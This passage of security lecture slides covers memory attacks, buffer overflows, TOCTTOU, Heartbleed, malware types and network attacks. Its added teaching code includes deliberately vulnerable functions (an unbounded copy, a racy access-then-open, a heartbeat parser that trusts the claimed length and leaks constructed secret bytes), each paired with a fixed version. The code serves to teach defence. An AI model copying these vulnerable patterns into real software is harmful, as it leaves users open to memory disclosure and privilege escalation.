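 * to be searched for the item. Returns the number of entries cleared. */
int acm_revoke_object(const char *object) {
    int o = index_of(objects, NOBJS, object), cleared = 0;
    if (o < 0) return 0;
    for (int u = 0; u < NUSERS; u++)
        if (matrix[u][o]) { matrix[u][o] = 0; cleared++; }
    return cleared;
}

int main(void) {
    printf("alice may write report.txt: %d\n", acm_check("alice", "report.txt", PERM_W));
    printf("users on the ACL of report.txt: %d\n", acm_acl("report.txt", NULL, 0));
    printf("grants from administrator-*: %d\n", acm_grant_wildcard("administrator-*", "kernel.log", PERM_W));
    printf("entries cleared by revoking ls: %d\n", acm_revoke_object("ls"));
    return 0;
}
```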

OS Security: Attacks

Memory Attacks

• Motivation
– You can encrypt HD, USB drives, network traffic, etc.
– You cannot encrypt memory!
– A lot of sensitive information: keys, passwords, etc.
• Two categories of memory attacks
– Software attacks
– Hardware attacks

Memory Attacks

• Software attacks
– System bugs: allow a process to read any address, leaking (sensitive) information
– Swap and dump: memory contents are written to hard drives: swap, core dump, hibernation, crash reports, etc.
• Attackers: trigger a core dump and examine the dump file, looking for keys.
• It has been reported that core dumps of FTP servers and email servers contained passwords.
• Hypervisors: suspend the current state of a VM to a checkpoint file.
– Uncleared buffers

Memory Attacks

• Physical attacks
– Bypass OS, bypass CPU
– Directly read from RAM
– Cold boot attacks
• The remanence effect of RAM: the contents in RAM fade away gradually after power off, over several minutes (or hours at low temperature)
• Attacker: reboot the computer with an OS from a USB drive; or move the RAM chips to another machine
• Read from RAM – reduce the temperature so that data stays longer
• Completely bypass access control, encryption, task isolation, authentication, etc.
– DMA: direct memory access
CIS 4520 Introduction to Cryptography

Introduction to Software Security

Wenjing Zhang
[email protected]

Part 1. Non-malicious Program Errors

Introduction

• What is a “secure” program?
– Means different things to different people
• Is it secure if:
– it strictly adheres to specification
– runs for a long time without failure
– takes too long to break through security controls
– free from all faults

Faults in Programs

• Murphy’s Law: Anything that can go wrong will go wrong.
• Murphy’s Law for software engineering
– Any non-trivial code has bugs
– Bugs are hard to detect and eliminate
– …
• Not all software bugs lead to security consequences
– Many of them do
– Many of the consequences are severe

Faults in Programs

• Which is better:
– finding and fixing 20 faults in a module?
– finding and fixing 100 faults?
• Finding 100 could mean
– you have better testing methods
OR
– code is really bad; 100 were just the tip of the iceberg
• Software testing literature:
– finding many errors early → probably find many more

Faults in Programs

• Penetration
– an authorized simulation of real-world cyberattacks to uncover security flaws that could be exploited by hackers
• Fixing Faults: penetrate and patch
– hire tiger team to try to break software
– for each fault:
• release a patch
– bad idea since late 60s.
– why bad?

Faults in Programs

• Penetrate and patch: why is this bad?
– product was broken in the first place
– developers can only fix problems that they know about
– patches often only fix the symptom; they’re not a cure
– people don’t bother applying the patches
– patches can have holes
– patches might cause bad side effects
– patches tell the bad guys where the problems are
– might affect program performance or limit functionality
– more expensive than making it secure from the beginning

Program Security

• Can we make programs completely secure?
– Not easy
• Why? Software testing:
– makes sure that code does what it’s supposed to do
– for security: must also verify that it doesn’t do anything it isn’t supposed to do. Much harder
– programming techniques often change more quickly than security techniques

Program Security

• Approaches to find software vulnerabilities
• Code Review
– Manual code inspection and vulnerability reasoning
• Static Analysis
– Automated reasoning about the code with static program analysis
• Dynamic Testing
– Run the software with various inputs and watch for anomalies

Program Security

• IEEE Terminology
– error – human action that causes an incorrect result, may later cause a fault or failure.
– fault – incorrect step, process or data definition in a program
– failure – system doesn’t behave according to requirements
– a fault is an inside view - seen by developers
– a failure is an outside view - seen by users

Program Security

• Types of flaws
– validation error
– domain error
– serialization and aliasing
– inadequate authentication
– boundary condition violation
– other exploitable logic errors
• from Landwehr: Taxonomy of Security Flaws

Validation Errors

• Not checking validity of
– function arguments
– function return values
• Examples:
– type of variable
– length of a buffer
– permissions of a file
– other variable properties
– A DNS crash story: “,” in a domain name
• Should validation include checking user input?
Validation Errors

• “Fat Finger Syndrome”
– Japanese bank trader sale of a telecom stock
– intention to sell:
– 1 share at 600,000 yen
– actually sold:
– 600,000 shares at 1 yen
– cost company about $256 million
• several other similar examples

Validation Errors

• Qantas Airplane 10/7/2008
– QF72 from Singapore Changi to Perth.
– “Spike” of bad data sent to flight computer
– Sent plane into nose dive
– Australian Transport Safety Bureau:
• combination of a faulty design in FCPC (flight control primary computer) software of A330/A340, and a failure mode affecting one of the aircraft’s three ADIRUs (Air Data Inertial Reference Units)
• inadequate testing and oversight in the aircraft’s avionics system or software design process, combined with unexpected data patterns, could lead to incorrect aircraft control commands and compromise flight safety

Domain Errors

• “holes in the fences”
– insufficient protection of boundaries
– example: unauthorized user’s ability to read another user’s files within a multi-user system

Serialization, Aliasing

• Serialization
– vulnerability offered by asynchronous system behavior
– example: TOCTTOU flaws
• Aliasing
– when two or more objects may have the same name

Non-malicious Program Errors

• Buffer Overflow
– Simple problem
– Known about for decades
– Still very common!
– Accounted for 50% of all major advisories issued by CERT/CC in 1999
• The CERT Coordination Center (CERT/CC): Coordination Center of the Computer Emergency Response Team (CERT)
• Created in response to the Morris worm (interesting story, we will talk about it later)
• CERT/CC publishes security alerts

Buffer Overflow

• Memory organization
– Process’s memory, from lower to higher addresses: .text, .data, .bss, heap (marked by the heap pointer), then the stack (marked by the stack pointer) at the higher addresses
– Text: code segment
• Program instructions
• Read only
• Segmentation fault if you try to write to it
– Data segment
• Initialized data: global and static variables
• Uninitialized data: BSS
• Heap
Buffer Overflow

• Memory organization
– Stack
• Activation records (stack frames) for sub-programs
• Stack variables
– Contiguous block of memory
• Top of the stack: pointed to by the stack pointer (SP)
• Bottom of the stack: fixed address
– CPU instructions to PUSH and POP
Buffer Overflow

• Look into the stack
– The typical activation record for a function
• Arguments
• Return address: tells program where to go back to once the function has finished executing
• Old EBP (Extended Base Pointer): caller’s EBP; holds value of base pointer from the calling function to maintain the chain of function calls
• Local variables
– Stack layout, from the top of the stack (pointed to by ESP) toward higher addresses: local variables, saved EBP (pointed to by EBP), return address, function’s arguments

Buffer Overflow

• Function call example:

    void func(int a, int b, int c) {
        char buf[10];
        char cuf[20];
    }

    int main(void) {
        func(10, 20, 30);
        return 0;
    }

• Stack operations performed for the call func(10,20,30):
• push $30
• push $20
• push $10
• push return addr
• push (old) base ptr
• old stack ptr becomes new base ptr
• push buf
• push cuf
Buffer Overflow

• Function call example, step by step (stack contents listed from the top, at ESP, down toward main’s frame):
• At main(): ESP and EBP both point into main’s frame
• push $30, push $20, push $10: stack is 10, 20, 30, main’s frame; ESP points at 10
• push return addr, push (old) base ptr, old stack ptr becomes new base ptr: stack is old base pointer, return address (EIP), 10, 20, 30, main’s frame; ESP and EBP both point at the old base pointer
• push buf, push cuf: stack is cuf, buf, old base pointer, return address (EIP), 10, 20, 30, main’s frame; ESP points at cuf, EBP at the old base pointer
Buffer Overflow

• What we can do?
– Overflow buf:
• with malicious input data?
– Rewrite the return address
• The stack after the overflow: cuf, then buf filled with “AAAAAAAAAAA…”, the old base pointer and the return address (EIP) both overwritten with “AAAA”, then 10, 20, 30, main’s frame
– Now you can run any program
• As long as you know where it is
• To be executed after function finishes
• Most of attacks: execute a shell
Buffer Overflow

• So what?
– Shell runs with same permissions as program we overflowed!
• Background: more on Unix

Buffer Overflow

• Background: more on Unix
• Unix set-uid mechanism
– UID (User Identifier): A number assigned to users on UNIX-like systems, controlling access to resources by identifying the user owner
– Set-uid (set user ID): A file permission where an executable program runs with its owner’s permissions, allowing for potential privilege elevation
– There are legitimate needs for elevating a process’ privilege to perform its jobs, e.g. the passwd command
Buffer Overflow

• So what?
– Shell runs with same permissions as program we overflowed!
– If you successfully overflow a program that
• Is owned by root
• Has the set-uid bit set for the owner
• Fails to ensure that a write to a buffer is always within its bound
– How do you know?
– You get “Segmentation fault” with malicious input
• Invoke a “shellcode”
– You can invoke a shell as root…

Buffer Overflow

• When buffer overflow happens, data structures in memory will be corrupted, potentially changing the program’s behavior.
– In many cases it can lead to the execution of arbitrary code by attackers
• A common problem for unsafe programming languages such as C and C++.
• Local privilege escalation vulnerability, i.e. an attacker who already obtained local access on the system can escalate his privilege.
– If the setuid program is owned by root, an attacker who has user account privilege may gain root privilege on the system.

Buffer Overflow

• Buffer overflow controls
– Tools: ProPolice, StackGuard
– Idea: use a “canary” before return addr
• a reference to the canaries once used in coal mines to detect dangerous gases.
• Canary = random number
• Put there before func call
• Check after function finishes
• If canary isn’t dead, continue
• Stack layout with the canary: cuf, buf, old base pointer, canary word, return address (EIP), 10, 20, 30, main’s frame
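The func() from the slides with its 10-byte buf, written once without a bound (the defect) and once with a bound (the fix), plus a software stand-in for the StackGuard/ProPolice canary; this is an added example, not course code. The real canary is placed by the compiler inside the stack frame; here it is modelled as a struct member sitting after buf, so an over-long copy lands on it instead of on the saved EBP and return address, and the check made "after function finishes" sees the dead canary.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Added illustration (not course code). CANARY_VALUE stands in for the random
 * word a real implementation picks per process. */
#define CANARY_VALUE 0x5ec3e7a1u

/* Model of func()'s frame: buf followed by the "canary word". The compiler
 * aligns canary at offset 12, so two padding bytes sit between them; an
 * overflow of up to 12 bytes goes unnoticed, just as a real canary only
 * catches writes that reach the control data. */
struct frame {
    char buf[10];
    uint32_t canary;
};

/* Unbounded copy, the defect the slides describe: writes n bytes starting at
 * buf with no regard for sizeof buf. n is capped at the frame size only so
 * the model stays within defined behaviour. Returns bytes written. */
static size_t copy_unbounded(struct frame *f, const char *src, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy(f, src, n);                 /* runs straight through buf into canary */
    return n;
}

/* Hardened copy: refuses input that does not fit buf plus its terminator.
 * Returns 0 on success, -1 when the copy would overflow (no silent truncation). */
int copy_bounded(char *buf, size_t buf_size, const char *src, size_t n) {
    if (n + 1 > buf_size) return -1;
    memcpy(buf, src, n);
    buf[n] = '\0';
    return 0;
}

/* One simulated call of func(): set the canary, let the unsafe copy run, then
 * check the canary after the function body. Returns 1 if the overflow was
 * detected (canary dead), 0 if the frame is intact. */
int canary_detects_overflow(const char *input, size_t n) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary = CANARY_VALUE;
    copy_unbounded(&f, input, n);
    return f.canary != CANARY_VALUE;
}

int main(void) {
    char buf[10];
    const char *input = "AAAAAAAAAAAAAAAAAAAA";   /* constructed 20-byte input */
    printf("bounded copy of 9 bytes: %d\n", copy_bounded(buf, sizeof buf, input, 9));
    printf("bounded copy of 20 bytes: %d\n", copy_bounded(buf, sizeof buf, input, 20));
    printf("canary dead after 5 bytes: %d\n", canary_detects_overflow(input, 5));
    printf("canary dead after 14 bytes: %d\n", canary_detects_overflow(input, 14));
    return 0;
}
```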
Race Conditions

• Parallel threads or processes
– No guarantee of processing order (unless you very carefully manage it)
– May access the same resource at the “same” time
– Unanticipated behavior…

TOCTTOU

• Time of Check to Time of Use
• Real world example, purchase at a store:
– Time of check: the item costs $100; you count out the money on the counter
– Cashier turns around, you take $20 back
– Time of use: cashier doesn’t notice; you still get the $100 item

TOCTTOU

• Software security example: pseudocode for opening file stuff.txt:

    if (permission(user, stuff.txt))    // time of check
        open(stuff.txt)                 // time of use
    else
        return failure

• Suppose that stuff.txt is a symlink
• What would happen if we switched the link to a different file?

TOCTTOU

• TOCTTOU is unlikely?
– Timing would have to be perfect.
• But:
– can run program over and over
– only have to get it right once
– can run many other programs to lengthen time between check and open
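The "check permission, then open" sequence from the pseudocode above written in C beside the usual defence: open first, then do the checks on the descriptor you actually got. This is an added example, not course code; it assumes a POSIX system (Linux) with O_NOFOLLOW, fstat and mkdtemp, and builds its own fixture (a regular file and a symlink named stuff.txt pointing at it) in a temporary directory.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Added illustration (not course code). Assumes POSIX/Linux. */

/* Time of check ... time of use: the path is resolved twice, so whatever
 * stuff.txt points at between the two calls is what gets opened. Returns an
 * fd or -1. */
int open_racy(const char *path) {
    if (access(path, R_OK) != 0)          /* time of check: resolves the name */
        return -1;
    return open(path, O_RDONLY);          /* time of use: resolves it again */
}

/* Open once, then inspect the descriptor. The kernel's permission check is
 * part of open() itself, so check and use are one operation; O_NOFOLLOW makes
 * open() fail (ELOOP) when the last path component is a symlink, and fstat()
 * is bound to the opened inode, not to the name, so nothing can be swapped
 * behind it. Returns an fd or -1 with errno set. */
int open_checked(const char *path) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Builds the constructed fixture, runs both openers, and returns 1 when the
 * racy opener follows the symlink while the checked one refuses it but still
 * opens the regular file directly; 0 otherwise. */
int tocttou_demo(void) {
    char dir[] = "/tmp/tocttou.XXXXXX";
    if (mkdtemp(dir) == NULL) return 0;
    char real[64], lnk[64];
    snprintf(real, sizeof real, "%s/secret.txt", dir);
    snprintf(lnk, sizeof lnk, "%s/stuff.txt", dir);
    int ok = 0;
    FILE *f = fopen(real, "w");
    if (f) { fputs("constructed secret\n", f); fclose(f); }
    if (f && symlink(real, lnk) == 0) {
        int racy    = open_racy(lnk);      /* follows the link: opens secret.txt */
        int checked = open_checked(lnk);   /* ELOOP: refused */
        int direct  = open_checked(real);  /* the regular file itself is fine */
        ok = racy >= 0 && checked < 0 && direct >= 0;
        if (racy >= 0) close(racy);
        if (direct >= 0) close(direct);
    }
    unlink(lnk); unlink(real); rmdir(dir);
    return ok;
}

int main(void) {
    printf("racy opener follows symlink, checked opener refuses it: %d\n", tocttou_demo());
    return 0;
}
```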

The Heartbleed Bug

OpenSSL “Heartbleed” Bug

• Announced April, 2014. (But bad code has been in use since December 31, 2011!)
• Exploits a programming mistake in the OpenSSL implementation of the TLS “heartbeat hello” extension.
– Heartbeat protocol is used to keep a TLS connection alive without continuously transferring data.
– One endpoint (e.g., a Web browser) sends a HeartbeatRequest message containing a payload to the other endpoint (e.g. a Web server).
– The server then sends back a HeartbeatReply message containing the same payload.
– “Buffer over-read” error caused by a failure to check for an invalid read-length parameter.

OpenSSL “Heartbleed” Bug

• Heartbeat Request and Response Messages

    struct {
        HeartbeatMessageType type;
        uint16 payload_length;
        opaque payload[HeartbeatMessage.payload_length];
        opaque padding[padding_length];
    } HeartbeatMessage;

• Problem: no check that payload_length matches the actual length of the payload
• The total length of a HeartbeatMessage MUST NOT exceed 2^14 or max_fragment_length.
• type: heartbeat_request or heartbeat_response
• payload_length: The length of the payload
• payload: The payload consists of arbitrary content
• padding: The padding is random content that MUST be ignored by the receiver.
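The HeartbeatMessage layout above parsed out of a TLS record, once trusting payload_length the way the vulnerable code did and once with the check the fix introduced (header, claimed payload and the 16-byte minimum padding from RFC 6520 must all fit inside the received record). This is an added example, not OpenSSL's code; the record and the bytes that follow it in memory are constructed inline.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added illustration (not OpenSSL code). */
#define HB_HEADER_LEN 3      /* type (1 byte) + payload_length (2 bytes) */
#define HB_PADDING_MIN 16    /* RFC 6520: at least 16 bytes of padding */
#define HB_MAX_RECORD 16384  /* 2^14: maximum HeartbeatMessage size */

enum { HEARTBEAT_REQUEST = 1, HEARTBEAT_RESPONSE = 2 };

/* Vulnerable shape: copies payload_length bytes from where the payload starts
 * without ever consulting the real record length. In this demo 'mem' is a
 * buffer larger than the record, so the over-read stays inside it; in the
 * server it ran into neighbouring heap data. Returns bytes copied (capped at
 * out_cap only to keep the demo in bounds). */
size_t heartbeat_reply_unchecked(const uint8_t *mem, uint8_t *out, size_t out_cap) {
    uint16_t payload_length = (uint16_t)((mem[1] << 8) | mem[2]);
    size_t n = payload_length < out_cap ? payload_length : out_cap;
    memcpy(out, mem + HB_HEADER_LEN, n);
    return n;
}

/* Fixed shape: the record must be within 2^14, be a request, and be long
 * enough to hold header + claimed payload + minimum padding. Returns payload
 * bytes copied, or 0 to silently discard a malformed message. */
size_t heartbeat_reply_checked(const uint8_t *rec, size_t rec_len,
                               uint8_t *out, size_t out_cap) {
    if (rec_len < HB_HEADER_LEN + HB_PADDING_MIN || rec_len > HB_MAX_RECORD)
        return 0;
    if (rec[0] != HEARTBEAT_REQUEST)
        return 0;
    uint16_t payload_length = (uint16_t)((rec[1] << 8) | rec[2]);
    if ((size_t)HB_HEADER_LEN + payload_length + HB_PADDING_MIN > rec_len)
        return 0;                      /* the check Heartbleed was missing */
    if (payload_length > out_cap)
        return 0;
    memcpy(out, rec + HB_HEADER_LEN, payload_length);
    return payload_length;
}

/* Constructed memory: a request carrying a 1-byte payload but claiming 64,
 * followed by 16 padding bytes and then bytes standing in for a neighbour's
 * secret. The array is sized so the unchecked copy never leaves it. */
static const uint8_t demo_mem[HB_HEADER_LEN + 64] = {
    HEARTBEAT_REQUEST, 0x00, 0x40,                 /* payload_length = 64 */
    'H',                                           /* the only real payload byte */
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* 16 bytes of padding */
    'S', 'E', 'C', 'R', 'E', 'T', '-', 'K', 'E', 'Y' /* rest of the array is 0 */
};
#define DEMO_RECORD_LEN (HB_HEADER_LEN + 1 + HB_PADDING_MIN)   /* 20 bytes on the wire */

/* Returns 1 if the unchecked reply returned bytes from beyond the record. */
int demo_unchecked_leaks(void) {
    uint8_t out[128];
    size_t n = heartbeat_reply_unchecked(demo_mem, out, sizeof out);
    return n > DEMO_RECORD_LEN - HB_HEADER_LEN && memcmp(out + 17, "SECRET", 6) == 0;
}

/* Returns the payload length the checked parser yields for a well-formed
 * request carrying "hello" (5 bytes) with minimum padding. */
size_t demo_checked_valid(void) {
    uint8_t rec[HB_HEADER_LEN + 5 + HB_PADDING_MIN] =
        { HEARTBEAT_REQUEST, 0x00, 0x05, 'h', 'e', 'l', 'l', 'o' };
    uint8_t out[16];
    size_t n = heartbeat_reply_checked(rec, sizeof rec, out, sizeof out);
    return (n == 5 && memcmp(out, "hello", 5) == 0) ? n : 0;
}
```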
OpenSSL “Heartbleed” Bug

Source: http://www.theregister.co.uk/2014/04/09/heartbleed_explained/
Open Source vs. Closed Source

• Discussion: Which is better: Open source or closed?
– Argument: Closed source more secure because it’s harder to find flaws to exploit.
– Argument: Open source more secure because more eyes on code.
– What’s your take?

Open Source vs. Closed Source

• Discussion: Which is better: Open source or closed?
– Argument: Closed source more secure because it’s harder to find flaws to exploit.
– but there are tools for finding flaws
– patches tell you where to look
– fewer people looking at code
– often longer to release fixes

Open Source vs. Closed Source

• Discussion: Which is better: Open source or closed?
– Argument: Open source more secure because more eyes on code.
– Do you look at the code?
– Code authors can be temporary, weekend warriors
– Often not very strict quality standards
• Kernels usually good, but drivers, other software packages can be shoddy
– Code might make job easier on hacker
• Can just do a grep on source for vulnerable functions
Common Vulnerabilities and Exposures

• The CVE platform
– CVE is a list of entries - each containing an identification number, a description, and at least one public reference - for publicly known cybersecurity vulnerabilities
– maintained by the National Cybersecurity FFRDC (Federally Funded Research and Development Center), operated by MITRE
– indexes all publicly known information-security vulnerabilities and exposures
– CVE prefix + Year + Arbitrary Digits
– Anyone can submit to CVE

Patching

• Patching OS and applications
– Importance of patching
– Timing: vulnerability window
– 0-day vulnerabilities
– Vulnerability scanning

Non-malicious Program Errors

• Summary:
– Software testing: code does what it’s supposed to do.
– Software security: code doesn’t do anything it isn’t supposed to do.
• Much harder
– Program errors could be exploited by adversaries to gain control of the system, deploy Trojan horses, etc.

Part 2. Malicious Software

Malicious Software (a.k.a. Malware)

• Malicious code: designed to do things “it isn’t supposed to do”
– Virus (requires a host program to spread)
– trojan horse
– logic bomb (triggered by a specific event)
– time bomb (special case of logic bomb)
– trapdoor (backdoor)
– worm (standalone software that spreads across multiple systems)
– rabbit (replicates within a single system)
– Rootkit (hides, operates at deep level within OS)

Trojan Horses

• Trojan horses: program with
– Open, known effect
– And a secret effect
• Example: game that searches hard drive for passwords

Trojan Horses

• The secret effects of Trojan horses
– Control the computer (Zombie computers)
– Steal information: passwords, bank accounts, credit card numbers, SSN, etc.
– Install (malicious) software
– Monitor and control hardware: key logger, watch screen, view webcam
– More?

Viruses

• Viruses: program which
– infects other files (inserts itself into)
– performs some action
• Many types:
– boot sector
– executable file infector
– multipartite (different targets e.g. either boot sector or exe)
– encrypted viruses
– polymorphic viruses
– macro virus

Viruses

• How do viruses attach?
– Appended (prepended)
– Surrounding
– Replace
– Example: Windows .com precedence over .exe
• virus is calc.com
• when you run calc
• calc.com runs
• then it calls calc.exe
• virus renames itself to calc.exe and then moves old calc.exe to different filename or hidden filename to directory that’s not often accessed

Viruses

• How do viruses attach?
– Integrated
– Requires more detailed knowledge about program structure

Viruses

• Boot Sector Virus
– Normal boot operation:
• BIOS (Basic Input/Output System)
• Master Boot Record (MBR)
• Partition boot sector, aka. volume boot sector/record
• Operating system
– Virus example: Michelangelo (1991)
• moved MBR someplace else (last sector of root dir)
• copied itself into MBR
• on boot, Michelangelo ran, then normal MBR
• spread by copying itself to floppy disks
• March 6 (artist’s bday), trashes hard disk

Viruses

• Document Virus
– Malicious programs that are embedded within documents
– Often use macros to execute malicious code
– Macros are sets of instructions that automate tasks, for example
• Microsoft’s Visual Basic for Applications (VBA)
• Commonly used in Word, Excel, etc.
– Hiding within default template docs:
• MS Office: Normal.dot, Personal.xls, Blank.pot
• Propagate whenever a user unintentionally creates a new document based on infected template

Viruses

• Virus Detection
– detect change in file size
• viruses often add or remove code in a file, which changes its original size
• virus writer counter-move: remove or compress part of original file to mask the change in file size
– look for virus signature
• digital fingerprint unique to each virus
• used by antivirus software to identify and remove viruses
• virus writer counter-move: polymorphism, encryption, use a kit to write a different virus with similar effect

Viruses vs. Trojan Horses

• Differences between Viruses and Trojan horses?
– Viruses:
• Malicious programs that self-replicate
• Spread to other computers/files
• Require user action to initiate (e.g., opening an email attachment)
– Trojan Horses:
• Malware posing as legitimate software
• Do not self-replicate
• Cause damage by creating backdoors for other malware

Discussions

• True or false:
– Viruses can only affect MS Windows
– Viruses can modify hidden or read-only files
– Viruses can’t remain in memory after power-off
– Viruses can’t infect hardware

Worms

• Worms: standalone software that propagates from one computer to another over a network
• Morris Worm – Nov. 2, 1988
– First worm released in history
– Written by Robert Morris, then a student at Cornell
– Released from MIT
– “to gauge the size of the Internet”: by observing how widely and rapidly the worm could spread
– Scanned for and exploited vulnerabilities of Unix machines to connect and infect
• e.g., buffer overflow, weak authentication, trust within network
– Re-infects targets at 1/7 rate → DoS attacks
– First person convicted (1990) of violating the Computer Fraud and Abuse Act: three years of probation, 400 hours of community service, a fine of $10,050, and the costs of his supervision.
Rootkits

• Definition
– a collection of malicious software tools that are installed on a computer without the user’s knowledge
• Purposes
– designed to gain unauthorized root or administrative access to your computer
– maintain persistent and undetectable presence on the system
– monitor and control the system by an attacker

Rootkits

• Sony XCP Rootkit
– Extended Copy Protection (XCP)
• Intention: copy protection of CDs
– Affects MS Windows
– Installs itself through AutoRun
– Three components:
• Anti-copying program
• Stealth component: hides program’s existence deeply within OS to prevent copying music
• “Phone home” feature: contacts Sony
– Tells Sony user’s listening habits, when disk is played, and from where, for ads, etc.
– CD contains no uninstaller

Rootkits

• Sony XCP program loaded with AutoRun
– Displays EULA (End User License Agreement)
– Loads program when inserting music CDs
– Runs before user agrees
• Doesn’t mention
– “Phone home” feature
• Consequences
– Lawsuits and a recall of affected CDs
– Sony released a removal tool for the software

Rootkits

• How do rootkits get into computers?
– Phishing Attacks
• users tricked into downloading malicious attachments or clicking on malware-laden links
– Drive-by Downloads
• automatic downloads from compromised websites
– Software Vulnerabilities
• exploits in unpatched operating systems, applications, or services
– Physical Access
• direct installation by an individual with access to the computer
– Infected External Devices
• introduced via USB drives or other external media
Rootkits

• Prevention
– Use up-to-date antivirus and anti-rootkit tools
– Regularly apply security patches to all software
– Employ safe browsing and email handling practices
– Enforce strong security policies and user permissions
– Be cautious with external devices and software installations

Software Security Controls

• Developmental Controls
– Good software engineering practice
– Modularity
– Encapsulation, information hiding
– Separation, isolation
– Layering
– Testing
– Peer reviews
– Designing good specifications
– Least astonishment
– Proofs of program correctness
– Fail-safe mechanisms
Software Security Controls

• Operating Systems Controls
– trusted software
– protection, confinement
– limited privilege
– logging

CIS 4520 Introduction to Cryptography

Network Security

Wenjing Zhang
[email protected]

Outline

• Introduction
• Terminologies
• Network Attacks
• Network Security Controls
• Application Security
– Web Security
• Phishing
• SQL Injection
– Email Security

1. Introduction

Network Security Topics

• Vulnerabilities, Threats, and Attacks
– 7-layer OSI model or TCP/IP model
– Threats on each layer
• Network Security Protocols
– Kerberos, SSL/TLS, SSH, HTTPS, IPSec
• Security Systems
– Firewalls
– Intrusion detection systems (IDS)
• Application Security
– Web
– Email
Network Model & Protocols (OSI)

(Figure of the OSI layers and their protocols. Source: BMC Software)


Network Model: OSI vs. TCP/IP

• Both models conceptualize network communication
– TCP/IP: widely implemented, practical
– OSI: structured, detailed understanding

Network Security Topics

TCP/IP Model | Common Attacks | Security Countermeasures
Physical Layer (1) | Packet Sniffing | Encryption (SSH, SSL/TLS, HTTPS)
Data Link Layer (2) | Address Resolution Protocol (ARP) Poisoning | Network Segmentation (Virtual Local Area Networks - VLANs)
Network Layer (3) | Denial of Service; IP Spoofing (for TCP Hijacking) | Intrusion Detection Systems (IDS)
Network Layer (3) | Ping of Death | Firewall, IDS
Network Layer (3) | Smurf attack | IDS
Transport Layer (4) | TCP Hijacking | IPSec
Transport Layer (4) | Denial of Service (e.g., SYN Flood) | Ingress filtering, IDS

Network Security Topics

TCP/IP Model | Common Attacks | Security Countermeasures
Application Layer (5) | Software Bugs/Buffer Overflows | IDS
Application Layer (5) | DNS Water Torture | Firewalls
Application Layer (5) | Web security: SQL injection, Cross-site scripting (XSS) | Web Application Firewalls (WAFs)
Application Layer (5)Iwas| Email Security | PGP, SSH encryption
Application Layer (5) | Social Engineering | Security Education

2. Terminologies: Crypto Primitives, Cryptographic Protocols, Network Security Protocols, Network Security Systems

Crypto Primitives

• Block Ciphers
• Stream Ciphers
• Hash Functions
• Public Key Encryption/Decryption
• Public Key Signing/Verification
• …
• All primitives can be seen as an algorithm (or a function) with well-defined inputs and outputs

Cryptographic Protocols

• Utilize cryptographic primitives
• A sequence of steps where each step uses cryptographic functions
• For example, CBC defines a protocol for encrypting a file or a packet
– CBC involves repeated use of a simple function (a block cipher) in a specific manner

Network Security Protocols

• Network protocols: in networking, a protocol is a set of rules that allow two or more entities to communicate.
– Examples: HTTP, FTP, TLS, etc.
• Network security protocols: a set of rules and configurations that determine how to secure data as it travels across the network.
– Examples: HTTPS, SSL/TLS, SSH, IPsec, etc.

Network Security Systems

• IDS (Intrusion Detection System):
– Monitors network/system for malicious activities.
– Reports detected activities to an administrator.
• Firewalls:
– Monitor and control incoming/outgoing network traffic.
– Establish a barrier against external threats.
– Can be hardware, software, or both.
• Note: IDS and Firewalls are not protocols but part of a security infrastructure; they are security systems that utilize protocols to secure networks.
Comparison & Connection

• Cryptographic Primitives:
– Basic, low-level cryptographic algorithms.
– Provide basic security functions: encryption, hashing, digital signatures.
– Examples: AES, SHA-256, RSA.
• Network Security Protocols:
– Higher-level constructs using cryptographic primitives.
– Secure complex operations: secure communication, authentication, key exchange.
– Examples: SSL/TLS, SSH, HTTPS, IPsec.
• Connection:
– Cryptographic primitives are the building blocks for network security protocols, which are designed to secure higher-level operations.

14
3. Network Attacks
Physical Layer Security: Example
• Wireless communication systems attack
  – Passive keyless entry and start (PKES) systems
Francillon, A., Danev, B., & Capkun, S. (2011). Relay attacks on passive keyless entry and start systems in modern cars. In Proceedings of the Network and Distributed System Security Symposium (NDSS). ETH Zürich, Department of Computer Science.
Physical Layer Attack: Example
• Relay attacks on passive keyless entry and start (PKES) systems
Physical Layer Attack: Example
• Relay attacks on PKES systems
  – Relay in a parking lot
    • One antenna near the elevator
    • Attacker at the car while the car owner waits for the elevator
  – Keys in a locked house, car parked in front of the house
    • E.g., keys left on the kitchen table; put an antenna close to the window; open and start the car without entering the house
  – Tested in practice
Physical Layer Attack: Example
• Relay attacks on car models with PKES
  – 10 models from 8 manufacturers
  – Including KIA Soul, Volkswagen Tiguan
  – All use LF/UHF technology
Physical Layer Attack: Example
• Relay attacks capture the signal near one end (the car or the key fob) and forward it to the other end, using extra antennas and amplifiers to extend the communication range far beyond the intended few metres.
• Encryption does not prevent relay attacks on car entry/start systems: the attacker never decrypts or modifies the content, only relays and amplifies it.
  – Exploit the properties of the wireless channel to bypass the cryptographic challenge-response
Physical Layer Attack: Countermeasure
• Time-of-flight systems: detect extended signal travel time to prevent relay attacks.
• Distance bounding: ensures key fobs are close enough to prevent distant signal relays.
• Frequency hopping: complicates signal interception by constantly changing frequencies.
• Reducing key fob power: limits operational range, deterring distant attackers.
• Bi-directional authentication: confirms the key fob's physical presence, not just signal presence.
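Added example (not from the paper or the lecture): the time-of-flight / distance-bounding check from the first two countermeasures above, as a car-side decision. All timings (the fob's processing delay, the relay's added delay) are constructed values, not measurements.

```python
# Added example: distance bounding for a PKES fob. Timings are constructed.
C = 299_792_458.0  # speed of light in m/s: about 3.3 ns per metre, one way


def implied_distance_m(rtt_s: float, fob_processing_s: float) -> float:
    """Upper bound on the fob's distance implied by a measured round-trip time.

    A relay can only ADD delay (extra radios, cables, amplifiers), never remove
    it, so the fob can be no farther than this bound, and a relayed fob always
    looks farther away than it really is.
    """
    return max(0.0, rtt_s - fob_processing_s) * C / 2


def accept_fob(rtt_s: float, fob_processing_s: float, bound_m: float = 2.0) -> bool:
    """Car-side decision: unlock only if the fob is provably within bound_m."""
    return implied_distance_m(rtt_s, fob_processing_s) <= bound_m


def simulate_rtt(distance_m: float, fob_processing_s: float,
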